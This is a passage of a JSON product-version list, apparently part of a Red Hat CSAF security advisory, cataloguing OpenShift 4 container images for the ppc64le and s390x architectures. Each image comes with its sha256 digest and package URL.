"name": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-cloud-controller-manager-rhel9@sha256%3Aec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563524"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-machine-controllers-rhel9@sha256%3Acc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775562680"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"product_id": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openshift-route-controller-manager-rhel9@sha256%3Afc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565065"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-service-ca-rhel9-operator@sha256%3A4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604108"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tools-rhel9@sha256%3Ad3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564250"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-microshift-rhel9@sha256%3Ac8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577164"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prom-label-proxy-rhel9@sha256%3A6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606843"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-config-reloader-rhel9@sha256%3A5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604108"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9-operator@sha256%3A6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606131"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-operator-admission-webhook-rhel9@sha256%3Aceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606725"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-telemeter-rhel9@sha256%3A42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604846"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-thanos-rhel9@sha256%3A60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606385"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9@sha256%3A78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573215"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"product": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"product_id": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-karpenter-provider-aws-rhel9@sha256%3Ae5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572657"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"product": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"product_id": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-kms-encryption-provider-rhel9@sha256%3A9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564570"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"product": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"product_id": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-kms-encryption-provider-rhel9@sha256%3Ac17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605177"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-machine-controllers-rhel9@sha256%3A895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557298"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-runtimecfg-rhel9@sha256%3A9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565214"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-etcd-rhel9-operator@sha256%3Af66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564931"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-monitoring-rhel9-operator@sha256%3A1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606566"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-network-rhel9-operator@sha256%3Abd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604232"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-node-tuning-rhel9-operator@sha256%3Aacebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-policy-controller-rhel9@sha256%3A3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605144"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-storage-rhel9-operator@sha256%3Af677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606817"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-version-rhel9-operator@sha256%3Ae233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606380"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"product_id": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-configmap-reloader-rhel9@sha256%3A73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606351"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"product": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"product_id": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/container-networking-plugins-microshift-rhel9@sha256%3Ae44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564694"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"product_id": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-coredns-rhel9@sha256%3A46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572853"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-attacher-rhel9@sha256%3Aeec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-livenessprobe-rhel9@sha256%3A1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564147"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-node-driver-registrar-rhel9@sha256%3A68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563664"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-provisioner-rhel9@sha256%3A75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563562"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"product": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"product_id": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/driver-toolkit-rhel9@sha256%3A313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775629870"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"product": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"product_id": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/egress-router-cni-rhel9@sha256%3Aaf94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"product_id": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-workload-identity-federation-webhook-rhel9@sha256%3A70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604398"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
